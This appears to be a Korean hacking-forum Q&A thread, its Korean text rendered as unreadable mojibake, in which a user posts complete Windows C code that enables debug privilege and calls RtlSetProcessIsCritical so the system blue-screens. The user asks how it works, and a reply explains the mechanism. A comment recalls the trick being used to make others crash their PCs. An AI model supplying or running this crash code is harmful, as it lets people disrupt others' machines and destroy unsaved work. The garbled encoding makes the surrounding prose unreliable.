ÇÁ·Î±×·¡¹Ö

 3206, 1/161 ȸ¿ø°¡ÀÔ  ·Î±×ÀΠ 
   h@cking2013
   ºí·ç½ºÅ©¸° ¼Ò½º

http://www.hackerschool.org/HS_Boards/zboard.php?id=QNA_programming&no=6450 [º¹»ç]


¾È³çÇϼ¼¿ä.
ÀÎÅͳݿ¡¼­ ºí·ç½ºÅ©¸°À» ¶ç¿ì´Â ¼Ò½º¸¦ ¿ì¿¬È÷ ¹ß°ßÇÏ¿´½À´Ï´Ù.

#include <windows.h>

typedef VOID ( _stdcall *RtlSetProcessIsCritical ) (
               IN BOOLEAN        NewValue,
               OUT PBOOLEAN OldValue,
               IN BOOLEAN      IsWinlogon );

BOOL EnablePriv(LPCSTR lpszPriv)
{
    HANDLE hToken;
    LUID luid;
    TOKEN_PRIVILEGES tkprivs;
    ZeroMemory(&tkprivs, sizeof(tkprivs));

    if(!OpenProcessToken(GetCurrentProcess(), (TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY), &hToken))
        return FALSE;

    if(!LookupPrivilegeValue(NULL, lpszPriv, &luid)){
        CloseHandle(hToken); return FALSE;
    }

    tkprivs.PrivilegeCount = 1;
    tkprivs.Privileges[0].Luid = luid;
    tkprivs.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;

    BOOL bRet = AdjustTokenPrivileges(hToken, FALSE, &tkprivs, sizeof(tkprivs), NULL, NULL);
    CloseHandle(hToken);
    return bRet;
}

BOOL ProtectProcess()
{
   HANDLE hDLL;
   RtlSetProcessIsCritical fSetCritical;

   hDLL = LoadLibraryA("ntdll.dll");
   if ( hDLL != NULL )
   {
         EnablePriv(SE_DEBUG_NAME);
        (fSetCritical) = (RtlSetProcessIsCritical) GetProcAddress( (HINSTANCE)hDLL, "RtlSetProcessIsCritical" );
          if(!fSetCritical) return 0;
          fSetCritical(1,0,0);
    return 1;
   } else
          return 0;
}

int main (void)
{
ProtectProcess();
return 1;
}

¾î¶² ¿ø¸®Àΰ¡¿ä?
  Hit : 6639     Date : 2014/03/23 03:12


    
MainThread hDLLÀ̶ó´Â DLLÆÄÀÏÀ» ÅëÇØ RtlSetProcessIsCriticalÇÔ¼ö¸¦ ¾ò¾î¿À°í ÀÖ½À´Ï´Ù.
- RtlSetProcessIsCritical´Â ÀÓ°èÇÁ·Î¼¼½º¸¦ »ý¼ºÇϱâ À§ÇÑ ÇÔ¼öÀÔ´Ï´Ù.
- ÀÓ°èÇÁ·Î¼¼½º(Critical Process)´Â Á¾·áµÇÁö ¾Ê´Â Áï, ºí·ç½ºÅ©¸°À» À¯¹ß½ÃÅ°´Â ÇÁ·Î¼¼½ºÀÔ´Ï´Ù.

GetProcAddress¿¡ ´ëÇØ ÀÚ¼¼È÷ ¾Ë°í ½ÍÀ¸½Ã´Ù¸é MSDNÀ» Âü°íÇØ º¸¼¼¿ä
From MainThread		 2014/05/24  
h@cking2013 °¨»çÇÕ´Ï´Ù! 2014/07/30  
±èº´±Ç ¿¾³¯¿¡ ¾î¶² ºÐÀÌ ³×ÀÌÆ®¿ÂÀ¸·Î ºí·ç½ºÅ©¸° È­¸é¿¡ ¶ç¿öºÁ¶ó°í ÇÏ´øµ¥...
±â¾ïÀÌ ³ª³×¿ä. ÁÁÀº Á¤º¸ °¨»çÇØ¿ä... ¤»¤»		 2015/02/01  
±èº´±Ç 6³âÀº µÈ °Å¶óµµ ±â¾ïÀÌ ³ª±ä ³³´Ï´Ù ¤»¤»¤»¤» 2015/02/01  
somass °¨»çÇÕ´Ï´Ù 2022/09/16  
3206   SNSÇØÅ·ÀÌ µÇ³ª¿ë? µµ¿ÍÁÖ¼¼¿ä ¤Ð¤Ð¤Ð [2]    New! ÇÑä¹Î
 02/28 329
3205   Ä¡Æ®¿£Áø °í¼öºÐ °è½Ç±î¿ä[1]     rjsdudals123
 02/15 183
3204   ¿À·ù Á» ã¾ÆÁÖ¼¼¿ä [1]     marunim
 05/30 913
3203 ºñ¹Ð±ÛÀÔ´Ï´Ù  124     minsub87
 08/17 1
3202   c¾ð¾î segmentation fault:11 ¿À·ù Áú¹®µå¸³´Ï´Ù![2]     leebk1124
 05/21 2003
3201   C++ÇÔ¼ö°ü·Ã Áú¹®ÀÌ¿¡¿ë!![3]     1999dylee
 05/11 1836
3200   ÆÄÀ̽ã Áö¹® µå¸³´Ï´Ù.[1]     kksh1107
 04/24 1577
3199   ¸®¹ö½ÌÀÇ ¼¼¹ø¤Š ²É - ¿ª¶û-     nninni79
 04/20 2280
3198   ´Þ°í³ª ¹®¼­ ½©ÄÚµå[1]     ghjk645
 03/24 1598
3197 ºñ¹Ð±ÛÀÔ´Ï´Ù  c¾ð¾î ¼Ò¼ö °ª     adwefq
 04/29 0
3196   C¾ð¾î ¼Ò½ºÁú¹®ÀÔ´Ï´Ù![5]     an0088
 01/05 5108
3195   C++ /// ºôµå ¿¡·¯ ¤Ð¤Ð[1]     guichanta
 08/23 2389
3194 ºñ¹Ð±ÛÀÔ´Ï´Ù  c¾ð¾î µµ¿ÍÁÖ¼¼¿ä¤Ð¤Ð     su6339
 04/06 0
3193   ÇØÅ·À» ¹è¿ì·Á°íÇϴµ¥[3]     zoodem04
 03/26 4176
3192   c¾ð¾î¸¦ ¹è¿ì°í½Í¾î¿ä ![7]     dwc07238
 02/11 4056
3191   ½ºÅÃÀÌ ½×ÀÌ´Â ¹æÇâ¿¡ °üÇؼ­!![1]     hackxx123
 12/10 3508
3190   ÇØÅ·Åø¿¡¼­ ip ¾øÀÌ Çϵ忡 ½É´Â°Å¿¡´Â ¾î¶²°Ô ÀÖÀ»±î¿ä?[2]     aowlrgmlals
 11/27 4261
3189   C¾ð¾î Çϴµ¥ double ½Ç¼ö¸¦ ³ÖÀºµ¥ ÀÚ²Ù 0.0ÀÌ ³ª¿Í¿ä[2]     fatou10336
 11/20 3716
3188   dumpcode.h ÀÌÇØÁ» µµ¿ÍÁÖ¼¼¿ä .[1]     cm6418
 11/06 3693
3187   c¾ð¾î ¾Ë°í¸®Áò Áú¹®ÀÔ´Ï´Ù.[3]     alstn8150
 10/12 3718
1 [2][3][4][5][6][7][8][9][10]..[161]

Copyright 1999-2024 Zeroboard / skin by Hackerschool.org / Secure Patch by Hackerschool.org